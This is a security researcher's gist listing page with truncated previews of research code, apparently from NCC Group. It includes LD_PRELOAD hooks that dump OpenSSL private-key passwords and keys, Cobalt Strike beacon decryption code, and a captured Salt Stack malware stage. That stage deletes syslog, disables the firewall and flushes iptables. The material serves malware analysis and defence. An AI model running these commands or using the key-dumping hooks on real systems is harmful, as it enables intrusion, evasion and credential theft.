Ollie olliencc
olliencc
/ dumpprivatekeypassword.c
Created
June 2, 2015 18:15
dump the password used by an openssl client for its private key using LD_PRELOAD and hooking the callback registration functions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/ | |
| // Licensed under the terms of GPLv3 (or any later version) at your choice | |
| // | |
| // works for daemons which can be run in the foreground | |
| // | |
| // gcc nccsslpasswdlog.c -shared -o nccsslpasswdlog.so -fPIC -ldl | |
| // | |
| // | |
olliencc
/ nccsslkeyandcertlog.c
Last active
August 29, 2015 14:22
dump the certificate and private in PEM format when used
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // based on https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/ | |
| // Licensed under the terms of GPLv3 (or any later version) at your choice | |
| // | |
| // works for daemons which can be run in the foreground | |
| // | |
| // gcc nccsslkeyandcertlog.c -shared -o nccsslkeyandcertlog.so -fPIC -ldl | |
| // | |
| // | |
olliencc
/ whodoineedtotrust.go
Created
January 2, 2016 21:16
Understand which CAs you need to trust for the Alexa top million
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Understand which CAs you need to trust for the Alexa top million | |
| Released as open source by NCC Group Plc - http://www.nccgroup.trust/ | |
| Developed by Ollie Whitehouse, ollie dot whitehouse at nccgroup dot trust | |
| Released under AGPL |
olliencc
/ PEDumpHelpScanner.py
Created
April 12, 2019 20:21
How to scan for Windows binaries with the MINIDUMP_AUXILIARY_PROVIDER resource section
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Ollie Whitehouse | |
| # ollie.whitehouse [@] nccgroup.com | |
| # | |
| import os | |
| import pefile | |
| rootdirs = [ | |
| #"C:/Data/NCC/!Research/DUMPHELPER/test/t/" |
olliencc
/ sendtoTeams.cs
Created
May 1, 2020 19:51
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net.Http; | |
| using System.Runtime.CompilerServices; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using Newtonsoft.Json; | |
| using MessageCardModel; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using MessageCardModel.Actions; |
olliencc
/ Salt Stack Second Stage from 217.12.210.192
Created
May 3, 2020 09:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /bin/sh | |
| ulimit -n 65535 | |
| rm -rf /var/log/syslog | |
| chattr -iua /tmp/ | |
| chattr -iua /var/tmp/ | |
| ufw disable | |
| iptables -F | |
| echo "nope" >/tmp/log_rot | |
| sudo sysctl kernel.nmi_watchdog=0 | |
| echo '0' >/proc/sys/kernel/nmi_watchdog |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import java.io.File; | |
| import java.util.Base64; | |
| import common.CommonUtils; | |
| import java.security.KeyPair; | |
| class DumpKeys | |
| { | |
| public static void main(String[] args) | |
| { | |
| try { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import M2Crypto | |
| import requests | |
| PRIVATE_KEY_TEMPLATE = "-----BEGIN PRIVATE KEY-----\n{}\n-----END PRIVATE KEY-----" | |
| PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----" | |
| class Metadata(object): | |
| """ | |
| Class to represent a beacon Metadata object | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib | |
| import hmac | |
| import binascii | |
| import base64 | |
| import sys | |
| import struct | |
| from Crypto.Cipher import AES | |
| HASH_ALGO = hashlib.sha256 | |
| SIG_SIZE = HASH_ALGO().digest_size |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # NOTE: insert decryption functions | |
| if __name__ == "__main__": | |
| SHARED_KEY = binascii.unhexlify("bca4caea1b3172aa979a5eac6c813184") | |
| HMAC_KEY = binascii.unhexlify("94b64efcf87b13c6828bcf14373bb2f9") | |
| with open(sys.argv[1], 'rb') as f: | |
| enc_data = f.read() | |
| encrypted_data, data_length = readInt(enc_data) | |
| print "Encrypted data should be: %d" % data_length | |
| signature = encrypted_data[-16:] |
OlderNewer